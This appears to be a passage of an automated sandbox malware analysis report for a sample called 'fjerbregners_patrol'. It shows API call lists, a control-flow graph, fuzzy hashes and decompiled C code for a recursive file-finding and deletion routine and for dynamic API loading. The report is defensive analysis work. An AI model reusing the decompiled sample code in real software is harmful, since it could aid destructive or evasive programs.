                                                                                                                                                                                            0x6ee823e5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee823eb
                                                                                                                                                                                            0x6ee823eb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee823eb
                                                                                                                                                                                            0x6ee82313
                                                                                                                                                                                            0x6ee82316
                                                                                                                                                                                            0x6ee82335
                                                                                                                                                                                            0x6ee82339
                                                                                                                                                                                            0x6ee8233f
                                                                                                                                                                                            0x6ee82344
                                                                                                                                                                                            0x6ee8234c
                                                                                                                                                                                            0x6ee82351
                                                                                                                                                                                            0x6ee82353
                                                                                                                                                                                            0x6ee82358
                                                                                                                                                                                            0x6ee8235e
                                                                                                                                                                                            0x6ee82364
                                                                                                                                                                                            0x6ee82367
                                                                                                                                                                                            0x6ee8236c
                                                                                                                                                                                            0x6ee82371
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82371
                                                                                                                                                                                            0x6ee8231b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82321
                                                                                                                                                                                            0x6ee82323
                                                                                                                                                                                            0x6ee8232c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8232c
                                                                                                                                                                                            0x6ee8231b
                                                                                                                                                                                            0x6ee82901
                                                                                                                                                                                            0x6ee82907
                                                                                                                                                                                            0x6ee8290d
                                                                                                                                                                                            0x6ee82911
                                                                                                                                                                                            0x6ee82a8a
                                                                                                                                                                                            0x6ee82a93
                                                                                                                                                                                            0x6ee82925
                                                                                                                                                                                            0x6ee82927
                                                                                                                                                                                            0x6ee8292a
                                                                                                                                                                                            0x6ee829b5
                                                                                                                                                                                            0x6ee829b5
                                                                                                                                                                                            0x6ee829b8
                                                                                                                                                                                            0x6ee829ba
                                                                                                                                                                                            0x6ee829d7
                                                                                                                                                                                            0x6ee829dd
                                                                                                                                                                                            0x6ee829e3
                                                                                                                                                                                            0x6ee829e5
                                                                                                                                                                                            0x6ee829fc
                                                                                                                                                                                            0x6ee829fc
                                                                                                                                                                                            0x6ee829fc
                                                                                                                                                                                            0x6ee82a04
                                                                                                                                                                                            0x6ee82a09
                                                                                                                                                                                            0x6ee82a11
                                                                                                                                                                                            0x6ee82a13
                                                                                                                                                                                            0x6ee82a15
                                                                                                                                                                                            0x6ee82a18
                                                                                                                                                                                            0x6ee82a1a
                                                                                                                                                                                            0x6ee82a21
                                                                                                                                                                                            0x6ee82a27
                                                                                                                                                                                            0x6ee82a29
                                                                                                                                                                                            0x6ee82a2b
                                                                                                                                                                                            0x6ee82a30
                                                                                                                                                                                            0x6ee82a42
                                                                                                                                                                                            0x6ee82a42
                                                                                                                                                                                            0x6ee82a30
                                                                                                                                                                                            0x6ee82a29
                                                                                                                                                                                            0x6ee82a18
                                                                                                                                                                                            0x6ee82a48
                                                                                                                                                                                            0x6ee82a4c
                                                                                                                                                                                            0x6ee82a56
                                                                                                                                                                                            0x6ee82a57
                                                                                                                                                                                            0x6ee82a5f
                                                                                                                                                                                            0x6ee82a61
                                                                                                                                                                                            0x6ee82a6b
                                                                                                                                                                                            0x6ee82a72
                                                                                                                                                                                            0x6ee82a74
                                                                                                                                                                                            0x6ee82a7e
                                                                                                                                                                                            0x6ee82a84
                                                                                                                                                                                            0x6ee82a84
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82a86
                                                                                                                                                                                            0x6ee82a86
                                                                                                                                                                                            0x6ee82a86
                                                                                                                                                                                            0x6ee82a86
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82a86
                                                                                                                                                                                            0x6ee82a76
                                                                                                                                                                                            0x6ee82a76
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82a4e
                                                                                                                                                                                            0x6ee82a4e
                                                                                                                                                                                            0x6ee82a54
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82a54
                                                                                                                                                                                            0x6ee82a4c
                                                                                                                                                                                            0x6ee829e8
                                                                                                                                                                                            0x6ee829ee
                                                                                                                                                                                            0x6ee829f4
                                                                                                                                                                                            0x6ee829f6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee829f6
                                                                                                                                                                                            0x6ee829bc
                                                                                                                                                                                            0x6ee829c3
                                                                                                                                                                                            0x6ee829c9
                                                                                                                                                                                            0x6ee829cf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee829cf
                                                                                                                                                                                            0x6ee82930
                                                                                                                                                                                            0x6ee82933
                                                                                                                                                                                            0x6ee8299b
                                                                                                                                                                                            0x6ee8299b
                                                                                                                                                                                            0x6ee829a1
                                                                                                                                                                                            0x6ee829a3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee829a9
                                                                                                                                                                                            0x6ee829aa
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee829af
                                                                                                                                                                                            0x6ee82938
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8293e
                                                                                                                                                                                            0x6ee8293e
                                                                                                                                                                                            0x6ee82941
                                                                                                                                                                                            0x6ee82947
                                                                                                                                                                                            0x6ee82949
                                                                                                                                                                                            0x6ee82952
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82958
                                                                                                                                                                                            0x6ee82960
                                                                                                                                                                                            0x6ee82965
                                                                                                                                                                                            0x6ee8296c
                                                                                                                                                                                            0x6ee82975
                                                                                                                                                                                            0x6ee8297b
                                                                                                                                                                                            0x6ee82981
                                                                                                                                                                                            0x6ee82994
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82994

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 6EE812C6: GlobalAlloc.KERNEL32(00000040,6EE811C4,-000000A0), ref: 6EE812CE
                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 6EE827C0
                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6EE8281B
                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 6EE8286B
                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 6EE82876
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE82887
                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 6EE82901
                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 6EE82907
                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 6EE8290D
                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 6EE829D7
                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000008), ref: 6EE829E8
                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 6EE82A3C
                                                                                                                                                                                            • lstrlenA.KERNEL32(00000408), ref: 6EE82A57
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                            • API String ID: 245916457-336475711
                                                                                                                                                                                            • Opcode ID: b0c815f2bb8cc5a8649b5f59def7bf59a0e30da0ed4e783a18afb862fefaf4cb
                                                                                                                                                                                            • Instruction ID: ed660100d9f61dcf5a35a7cca7c31efad1d0388754a1fa8b14f217b7a320766d
                                                                                                                                                                                            • Opcode Fuzzy Hash: b0c815f2bb8cc5a8649b5f59def7bf59a0e30da0ed4e783a18afb862fefaf4cb
                                                                                                                                                                                            • Instruction Fuzzy Hash: EC32E2716587039FD744CFB9845075BBBE4BFAD318F208A2EE4AD93294D730C9468B92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004064FD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 160filestringCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 941 4064fd-406526 call 406421 944 406528-40653a DeleteFileA 941->944 945 40653f-406549 941->945 946 4066d9-4066e2 944->946 947 40654b-40654d 945->947 948 40655c-40656f call 40690a 945->948 950 406553-406556 947->950 951 4066c8-4066ce 947->951 955 406571-40657d lstrcatA 948->955 956 40657f-406580 call 406ac2 948->956 950->948 952 406692-40669a call 4063bd 950->952 954 4066d8 951->954 952->954 963 40669c-4066b0 call 406346 call 406373 952->963 954->946 958 406585-406588 955->958 956->958 961 406593-406599 lstrcatA 958->961 962 40658a-406591 958->962 964 40659b-4065c0 lstrlenA FindFirstFileA 961->964 962->961 962->964 974 4066d0-4066d3 call 405ba4 963->974 975 4066b2-4066b4 963->975 967 406680-406685 964->967 968 4065c6-4065d7 call 4063e4 964->968 967->954 970 406687-406690 967->970 976 4065d9-4065eb 968->976 977 4065ed-4065f1 968->977 970->951 970->952 974->954 975->951 978 4066b6-4066c6 call 405ba4 call 4060e5 975->978 976->977 980 4065f3-4065f8 977->980 981 406604-406614 call 40690a 977->981 978->954 982 4065fa-4065fc 980->982 983 40665b 980->983 990 406616-40661d 981->990 991 406628-406631 call 406373 981->991 982->981 986 4065fe-406602 982->986 989 40665f-406670 FindNextFileA 983->989 986->981 986->983 989->968 993 406676-40667a FindClose 989->993 990->989 994 40661f-406626 call 4064fd 990->994 1000 406651-406659 call 405ba4 991->1000 1001 406633-406635 991->1001 993->967 994->989 1000->989 1003 406637-406647 call 405ba4 call 4060e5 1001->1003 1004 406649-40664f 1001->1004 1003->989 1004->989
                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                            			E004064FD(void* __eflags) {
				signed int _t29;
				char* _t40;
				signed int _t42;
				signed int _t45;
				signed int _t51;
				signed int _t55;
				void* _t57;
				signed char _t58;
				signed int _t60;
				CHAR* _t61;
				signed int _t64;
				void* _t66;
				char* _t68;
				void* _t69;

				_t58 =  *(_t69 + 0x15c);
				_t61 =  *(_t69 + 0x15c);
				_t60 = _t58 & 0x00000004;
				_t29 = E00406421(__eflags, _t61);
				 *(_t69 + 0x18) = _t29;
				if((_t58 & 0x00000008) != 0) {
					_t55 = DeleteFileA(_t61); // executed
					asm("sbb eax, eax");
					_t57 =  ~_t55 + 1;
					 *0x4240c8 =  *0x4240c8 + _t57;
					return _t57;
				}
				_t64 = _t58 & 0x00000001;
				__eflags = _t64;
				 *(_t69 + 0x18) = _t64;
				if(_t64 == 0) {
					L5:
					E0040690A("miscalculates\glemmeprocesserne\overfatigues\skuddagens.til", _t61);
					__eflags = _t64;
					if(_t64 == 0) {
						E00406AC2(_t61);
					} else {
						lstrcatA("miscalculates\glemmeprocesserne\overfatigues\skuddagens.til", "\\*.*");
					}
					__eflags =  *_t61;
					if( *_t61 != 0) {
						L10:
						lstrcatA(_t61, 0x408298);
						goto L11;
					} else {
						__eflags =  *0x421658 - 0x5c;
						if( *0x421658 != 0x5c) {
							L11:
							_t66 =  &(_t61[lstrlenA(_t61)]);
							 *(_t69 + 0x10) = _t66;
							_t29 = FindFirstFileA("miscalculates\glemmeprocesserne\overfatigues\skuddagens.til", _t69 + 0x20); // executed
							 *(_t69 + 0x14) = _t29;
							__eflags = _t29 - 0xffffffff;
							if(_t29 == 0xffffffff) {
								L29:
								__eflags =  *(_t69 + 0x18);
								if( *(_t69 + 0x18) == 0) {
									goto L37;
								}
								__eflags =  *(_t69 + 0x1c);
								 *((char*)(_t66 - 1)) = 0;
								if( *(_t69 + 0x1c) == 0) {
									goto L35;
								}
								goto L31;
							} else {
								goto L12;
							}
							do {
								L12:
								_t68 = _t69 + 0x4c;
								_t40 = E004063E4(_t68, 0x3f);
								__eflags =  *_t40;
								if( *_t40 != 0) {
									__eflags =  *((char*)(_t69 + 0x150));
									_t53 =  ==  ? _t68 : _t69 + 0x150;
									_t68 =  ==  ? _t68 : _t69 + 0x150;
								}
								__eflags =  *_t68 - 0x2e;
								if( *_t68 != 0x2e) {
									L18:
									_t66 =  *(_t69 + 0x14);
									E0040690A(_t66, _t68);
									__eflags =  *(_t69 + 0x20) & 0x00000010;
									if(__eflags == 0) {
										_t42 = E00406373(__eflags, _t61, _t60);
										__eflags = _t42;
										if(_t42 != 0) {
											_push(_t61);
											_push(0xfffffff2);
											E00405BA4();
										} else {
											__eflags = _t60;
											if(_t60 == 0) {
												 *0x4240c8 =  *0x4240c8 + 1;
											} else {
												_push(_t61);
												_push(0xfffffff1);
												E00405BA4();
												E004060E5(_t61, 0);
											}
										}
									} else {
										__eflags = (_t58 & 0x00000003) - 3;
										if(__eflags == 0) {
											E004064FD(__eflags, _t61, _t58);
										}
									}
								} else {
									_t51 =  *((intOrPtr*)(_t68 + 1));
									__eflags = _t51;
									if(_t51 == 0) {
										L26:
										_t66 =  *(_t69 + 0x10);
										goto L27;
									}
									__eflags = _t51 - 0x2e;
									if(_t51 != 0x2e) {
										goto L18;
									}
									__eflags =  *((char*)(_t68 + 2));
									if( *((char*)(_t68 + 2)) == 0) {
										goto L26;
									}
									goto L18;
								}
								L27:
								_t45 = FindNextFileA( *(_t69 + 0x18), _t69 + 0x20);
								__eflags = _t45;
							} while (_t45 != 0);
							_t29 = FindClose( *(_t69 + 0x14));
							goto L29;
						}
						goto L10;
					}
				} else {
					__eflags = _t29;
					if(_t29 == 0) {
						L35:
						 *0x4240c8 =  *0x4240c8 + 1;
						L37:
						return _t29;
					}
					__eflags = _t58 & 0x00000002;
					if((_t58 & 0x00000002) == 0) {
						L31:
						_t29 = E004063BD(_t61);
						__eflags = _t29;
						if(_t29 == 0) {
							goto L37;
						}
						E00406346(_t61);
						_t29 = E00406373(__eflags, _t61, _t60 | 0x00000001);
						__eflags = _t29;
						if(_t29 != 0) {
							_push(_t61);
							_push(0xffffffe5);
							_t29 = E00405BA4();
							goto L37;
						}
						__eflags = _t60;
						if(_t60 == 0) {
							goto L35;
						}
						_push(_t61);
						_push(0xfffffff1);
						E00405BA4();
						_t29 = E004060E5(_t61, 0);
						goto L37;
					}
					goto L5;
				}
			}

















                                                                                                                                                                                            0x00406504
                                                                                                                                                                                            0x0040650c
                                                                                                                                                                                            0x00406517
                                                                                                                                                                                            0x0040651a
                                                                                                                                                                                            0x0040651f
                                                                                                                                                                                            0x00406526
                                                                                                                                                                                            0x00406529
                                                                                                                                                                                            0x00406531
                                                                                                                                                                                            0x00406533
                                                                                                                                                                                            0x00406534
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406534
                                                                                                                                                                                            0x00406542
                                                                                                                                                                                            0x00406542
                                                                                                                                                                                            0x00406545
                                                                                                                                                                                            0x00406549
                                                                                                                                                                                            0x0040655c
                                                                                                                                                                                            0x00406562
                                                                                                                                                                                            0x00406567
                                                                                                                                                                                            0x0040656f
                                                                                                                                                                                            0x00406580
                                                                                                                                                                                            0x00406571
                                                                                                                                                                                            0x0040657b
                                                                                                                                                                                            0x0040657b
                                                                                                                                                                                            0x00406585
                                                                                                                                                                                            0x00406588
                                                                                                                                                                                            0x00406593
                                                                                                                                                                                            0x00406599
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040658a
                                                                                                                                                                                            0x0040658a
                                                                                                                                                                                            0x00406591
                                                                                                                                                                                            0x0040659b
                                                                                                                                                                                            0x004065a2
                                                                                                                                                                                            0x004065a9
                                                                                                                                                                                            0x004065b3
                                                                                                                                                                                            0x004065b9
                                                                                                                                                                                            0x004065bd
                                                                                                                                                                                            0x004065c0
                                                                                                                                                                                            0x00406680
                                                                                                                                                                                            0x00406680
                                                                                                                                                                                            0x00406685
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406687
                                                                                                                                                                                            0x0040668c
                                                                                                                                                                                            0x00406690
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004065c6
                                                                                                                                                                                            0x004065c6
                                                                                                                                                                                            0x004065c6
                                                                                                                                                                                            0x004065cf
                                                                                                                                                                                            0x004065d4
                                                                                                                                                                                            0x004065d7
                                                                                                                                                                                            0x004065d9
                                                                                                                                                                                            0x004065e8
                                                                                                                                                                                            0x004065eb
                                                                                                                                                                                            0x004065eb
                                                                                                                                                                                            0x004065ed
                                                                                                                                                                                            0x004065f1
                                                                                                                                                                                            0x00406604
                                                                                                                                                                                            0x00406605
                                                                                                                                                                                            0x0040660a
                                                                                                                                                                                            0x0040660f
                                                                                                                                                                                            0x00406614
                                                                                                                                                                                            0x0040662a
                                                                                                                                                                                            0x0040662f
                                                                                                                                                                                            0x00406631
                                                                                                                                                                                            0x00406651
                                                                                                                                                                                            0x00406652
                                                                                                                                                                                            0x00406654
                                                                                                                                                                                            0x00406633
                                                                                                                                                                                            0x00406633
                                                                                                                                                                                            0x00406635
                                                                                                                                                                                            0x00406649
                                                                                                                                                                                            0x00406637
                                                                                                                                                                                            0x00406637
                                                                                                                                                                                            0x00406638
                                                                                                                                                                                            0x0040663a
                                                                                                                                                                                            0x00406642
                                                                                                                                                                                            0x00406642
                                                                                                                                                                                            0x00406635
                                                                                                                                                                                            0x00406616
                                                                                                                                                                                            0x0040661b
                                                                                                                                                                                            0x0040661d
                                                                                                                                                                                            0x00406621
                                                                                                                                                                                            0x00406621
                                                                                                                                                                                            0x0040661d
                                                                                                                                                                                            0x004065f3
                                                                                                                                                                                            0x004065f3
                                                                                                                                                                                            0x004065f6
                                                                                                                                                                                            0x004065f8
                                                                                                                                                                                            0x0040665b
                                                                                                                                                                                            0x0040665b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040665b
                                                                                                                                                                                            0x004065fa
                                                                                                                                                                                            0x004065fc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004065fe
                                                                                                                                                                                            0x00406602
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406602
                                                                                                                                                                                            0x0040665f
                                                                                                                                                                                            0x00406668
                                                                                                                                                                                            0x0040666e
                                                                                                                                                                                            0x0040666e
                                                                                                                                                                                            0x0040667a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040667a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406591
                                                                                                                                                                                            0x0040654b
                                                                                                                                                                                            0x0040654b
                                                                                                                                                                                            0x0040654d
                                                                                                                                                                                            0x004066c8
                                                                                                                                                                                            0x004066c8
                                                                                                                                                                                            0x004066d8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004066d8
                                                                                                                                                                                            0x00406553
                                                                                                                                                                                            0x00406556
                                                                                                                                                                                            0x00406692
                                                                                                                                                                                            0x00406693
                                                                                                                                                                                            0x00406698
                                                                                                                                                                                            0x0040669a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040669d
                                                                                                                                                                                            0x004066a9
                                                                                                                                                                                            0x004066ae
                                                                                                                                                                                            0x004066b0
                                                                                                                                                                                            0x004066d0
                                                                                                                                                                                            0x004066d1
                                                                                                                                                                                            0x004066d3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004066d3
                                                                                                                                                                                            0x004066b2
                                                                                                                                                                                            0x004066b4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004066b6
                                                                                                                                                                                            0x004066b7
                                                                                                                                                                                            0x004066b9
                                                                                                                                                                                            0x004066c1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004066c1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406556

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00406421: lstrlenA.KERNEL32(miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00000000,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00000000,?,?,0040651F,?,00000000,756D3410,?), ref: 00406470
                                                                                                                                                                                              • Part of subcall function 00406421: GetFileAttributesA.KERNELBASE(miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til), ref: 00406481
                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?,?,00000000,756D3410,?), ref: 00406529
                                                                                                                                                                                            • lstrcatA.KERNEL32(miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,\*.*,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,?,00000000,?,00000000,756D3410,?), ref: 0040657B
                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00408298,?,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,?,00000000,?,00000000,756D3410,?), ref: 00406599
                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040659C
                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,?), ref: 004065B3
                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?,?,?), ref: 00406668
                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040667A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                                                                                                                                            • String ID: \*.*$miscalculates\glemmeprocesserne\overfatigues\skuddagens.til
                                                                                                                                                                                            • API String ID: 2636146433-3489577185
                                                                                                                                                                                            • Opcode ID: 2fe4e5fd7202ca3d043c728da86ee8a7742ed6691b47ac93d66682119a8f147b
                                                                                                                                                                                            • Instruction ID: 3a3dae6c9d5a0c26f53bec56a02e7855231dad43051abac69790a2129ba8618d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fe4e5fd7202ca3d043c728da86ee8a7742ed6691b47ac93d66682119a8f147b
                                                                                                                                                                                            • Instruction Fuzzy Hash: B0518C301047546AD7317F258C05BAB3B989F52318F16093FF883B22D2C73D996986AE
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004063BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004063BD(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422a58); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422a58;
			}




                                                                                                                                                                                            0x004063c8
                                                                                                                                                                                            0x004063d1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004063de
                                                                                                                                                                                            0x004063d4
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(00000000,00422A58,00000000,00406460,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til), ref: 004063C8
                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004063D4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                            • String ID: X*B
                                                                                                                                                                                            • API String ID: 2295610775-1784105614
                                                                                                                                                                                            • Opcode ID: fa6870a516a23e93ce52d1f7afc8c95e241919f6054175faa4d1299c2efc000c
                                                                                                                                                                                            • Instruction ID: 7061e0797ffdea7edc937927787dd7069d62b34352498bf2c6dd7780b2753988
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa6870a516a23e93ce52d1f7afc8c95e241919f6054175faa4d1299c2efc000c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DD012319041306BC35057387F0C84B7A999F193713514A37B4A6F51E0C7B48C7386EC
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00404E83 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374windowstringCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
